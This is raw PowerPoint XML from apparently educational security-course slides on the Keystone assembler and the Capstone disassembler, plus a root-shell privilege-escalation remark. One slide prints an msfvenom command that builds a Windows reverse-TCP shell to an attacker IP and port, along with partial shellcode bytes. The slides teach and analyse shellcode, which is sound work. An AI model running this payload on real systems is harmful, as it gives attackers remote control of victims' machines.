        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F6A727-1FB2-40C2-928D-C0EE12E38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1252" y="3824748"/>
            <a:ext cx="8349916" cy="1930918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4684401B-B858-4DB7-BF2E-78808F8CBF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492739" y="5884157"/>
            <a:ext cx="11643113" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nice! Khalid has got a root shell! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This method isn’t as noisy as the previous method since we give our executable just enough power to give us a root shell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3312298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193</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Keystone Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCE338B-1B4B-49BE-A06F-0950AA054363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922419" y="1874739"/>
            <a:ext cx="10230855" cy="4128310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Keystone engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an Assembly engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This means that Keystone engine can transfer assembly code into binary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can help when developing/testing shellcodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use keystone engine to assemble shellcodes into binary form that we can execute in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don’t have to have the target architecture to assemble into another Instruction Set Architecture (ISA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can install keystone engine through pip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A079B882-E8BD-4905-829B-E32F05F0F7BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625121" y="6102170"/>
            <a:ext cx="4730184"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install keystone-engine</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26041437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194</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Keystone Engine (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6902D325-A56A-4271-BAAE-BDB3DF07D28E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329721" y="1874728"/>
            <a:ext cx="9821776"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keystone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CODE =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"mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1   ;"</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store 1 at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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"mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 8   ;"</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store 8 at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</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"add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>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ebx</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add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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ks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Ks(KS_ARCH_X86, KS_MODE_32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encoding, count = ks.asm(CODE)</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count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instructions have been encoded!"</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.join([</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x</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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:02x}</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encoding]))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36778403-8680-4FE6-A195-5BF12B2018E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741948" y="5259623"/>
            <a:ext cx="6128084" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1C0B87-69B7-44C1-9692-A30E3117E52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654574" y="5809055"/>
            <a:ext cx="982177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3 instructions have been encoded!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x08\x00\x00\x00\x01\xd8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18833312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195</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Capstone Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8959CAF0-4AD9-463C-9D95-13D7B8E79758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922419" y="1874739"/>
            <a:ext cx="11008897" cy="2327817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Capstone engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a disassembly engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use capstone engine to disassemble programs or shellcodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don’t have to have the target architecture to disassemble another Instruction Set Architecture (ISA) code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>capstone engine can be installed with pip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A18AF4-F713-461C-B553-4BFF880661EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370512" y="4341173"/>
            <a:ext cx="4730184"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install capstone</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8539314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196</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Capstone Engine (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47118E10-1E11-4332-9D96-CA9835E34559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329720" y="1874728"/>
            <a:ext cx="10585553" cy="289310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capstone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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f python -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.10.179 LPORT=9999 -v shellcode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shellcode =  </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shellcode += </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err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41</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shellcode += </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\x6f\x6a\x00\x59\x41\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xd5</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cs = Cs(CS_ARCH_X86, CS_MODE_64)</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cs.disasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(shellcode,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machine_code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.join([</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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:02x}</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x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i.bytes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machine_code.ljust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40</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i.mnemonic.ljust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i.op_str</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63215871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197</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Capstone Engine (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8810C9D2-5A25-4B86-B82E-7465221FF866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046747" y="1869938"/>
            <a:ext cx="10230851"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run this code with the host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>192.168.10.179</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>9999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we will notice the following in the output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7DEAB3C-A186-468A-99C2-D718CF99F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640" y="2278920"/>
            <a:ext cx="9889958" cy="2035024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAB6D29-7F06-49D5-A4F4-69A2647FEE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640305" y="4660214"/>
            <a:ext cx="9027695" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“b30aa8c0” is the attacker’s IP address. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“0f27” is the port. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“0002” is the Address Family (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to indicate that the communication should be established using the IPv4 protocol.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BA19BF-614B-4575-813C-2F66ED7C4BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8754979" y="3429000"/>
            <a:ext cx="2402305" cy="30881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AC8E5E1E-7E26-4006-8635-E53C348B1564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498556" y="6075143"/>
            <a:ext cx="8779042" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the target Instruction Set Architecture (ISA) is x86-64, the values are written with the ISA’s endianness (little-endian) in mind.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10562093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08748" y="189328"/>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198</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550545" y="1274457"/>
